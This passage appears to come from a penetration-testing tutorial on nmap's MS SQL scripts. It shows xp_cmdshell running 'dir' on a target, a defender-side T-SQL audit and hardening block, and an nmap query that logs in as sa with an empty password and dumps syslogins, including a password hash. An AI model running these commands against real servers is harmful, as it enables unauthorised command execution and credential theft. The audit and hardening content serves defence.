Host is up (0.00046s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
| [192.200.11.11:1433]
| Command: dir
| output
| ======
| Volume in drive C has no label.
| Volume Serial Number is 1E1E-6DAB
| Null
| Directory of C:\Windows\system32
| Null
| 19/06/2016 01:51 <DIR> .
| 19/06/2016 01:51 <DIR> ..
| 30/09/2013 16:44 <DIR> 0409
| 02/01/2016 12:33 <DIR> 1033
| 18/06/2013 07:48 160 @OpenWithToastLogo.png
| 18/06/2013 08:04 120 @TileEmpty1x1Image.png
| 22/08/2013 03:39 3,812,352 accessibilitycpl.dll
| 22/08/2013 04:45 39,424 ACCTRES.dll
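For the SQL Server side of the checks above (empty sa password, brute force, hash dumping and xp_cmdshell), the T-SQL below is an added example and not from the original note. It assumes a sysadmin connection to SQL Server 2012 or later and reports the same weaknesses the nmap scripts look for, without running a network scan.

```sql
-- Added defender-side audit (not from the original note). Run as sysadmin.
-- Each query maps to one of the nmap scripts above.

-- 1. ms-sql-empty-password: is sa enabled, and is its password still empty?
--    PWDCOMPARE() tests a clear-text candidate against the stored hash.
--    The password_hash column is what ms-sql-dump-hashes prints; the 0x0200
--    prefix seen above is the SHA-512 based format used since SQL Server 2012.
SELECT name,
       is_disabled,
       is_policy_checked,
       is_expiration_checked,
       CASE WHEN PWDCOMPARE(N'', password_hash) = 1 THEN 'EMPTY' ELSE 'set' END AS password_state
FROM   sys.sql_logins
WHERE  principal_id = 1;        -- sa keeps principal_id 1 even if renamed

-- 2. What an attacker inherits with sa: every member of the sysadmin role
SELECT m.name AS member, m.type_desc, m.is_disabled
FROM   sys.server_role_members rm
JOIN   sys.server_principals r ON r.principal_id = rm.role_principal_id
JOIN   sys.server_principals m ON m.principal_id = rm.member_principal_id
WHERE  r.name = N'sysadmin';

-- 3. ms-sql-xp-cmdshell: value_in_use = 1 means the 'dir' above would run
SELECT name, value_in_use
FROM   sys.configurations
WHERE  name IN (N'xp_cmdshell', N'show advanced options');

-- 4. ms-sql-brute: failed logins land in the SQL Server error log when
--    login auditing is set to 'Failed logins only' or 'Both'. A run of
--    'Login failed for user' lines from one client address is the scan.
EXEC master.dbo.xp_readerrorlog 0, 1, N'Login failed';

-- 5. Hardening for the findings above (review first, then uncomment):
-- ALTER LOGIN sa WITH PASSWORD = N'<long random password>';
-- ALTER LOGIN sa DISABLE;
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

Query 1 is the one that matters most: the whole chain on this page (hash dump, xp_cmdshell, arbitrary queries) starts from sa with an empty password, so a row reading EMPTY with is_disabled = 0 means every script above will succeed against the server.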

Running a SQL query

Runs a query against Microsoft SQL Server (ms-sql).

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password='',ms-sql-query.query="SELECT * FROM syslogins" 192.200.11.11

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 06:02 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00060s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
| [192.200.11.11:1433]
| Query: SELECT * FROM syslogins
| sid status createdate updatedate accdate totcpu totio spacelimit timelimit resultlimit name dbname password language denylogin hasaccess isntname isntgroup isntuser sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin loginname
| === ====== ========== ========== ======= ====== ===== ========== ========= =========== ==== ====== ======== ======== ========= ========= ======== ========= ======== ======== ============= =========== ========== ============ ========= ========= ========= =========
| 0x01 9 Apr 08, 2003 14:10:35 Jun 12, 2016 14:50:31 Apr 08, 2003 14:10:35 0 0 0 00sa master \x02\xEC\x7F\xFA%Kv\x84\x81L<\xE7+\xFB\xFB\x8ECQ\xC2@L\xE7\xD4\x95`\xAA=\xB9\xC5Ry\x06\xE4\x9Eh us_english0 1 0 0 0 1 0 0 0 0 0 0 0 sa
| 0x0106000000000009010000005FB6DAC7F7DB546D706711B128B5063888B01770 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLResourceSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLResourceSigningCertificate##
| 0x010600000000000901000000A0B7FCD6F6D5FA771521910A3B71A750568D6275 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLReplicationSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLReplicationSigningCertificate##
| 0x010600000000000901000000C2FB1C6E4485BB1056EBC85FD2CC2AD081390316 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLAuthenticatorCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLAuthenticatorCertificate##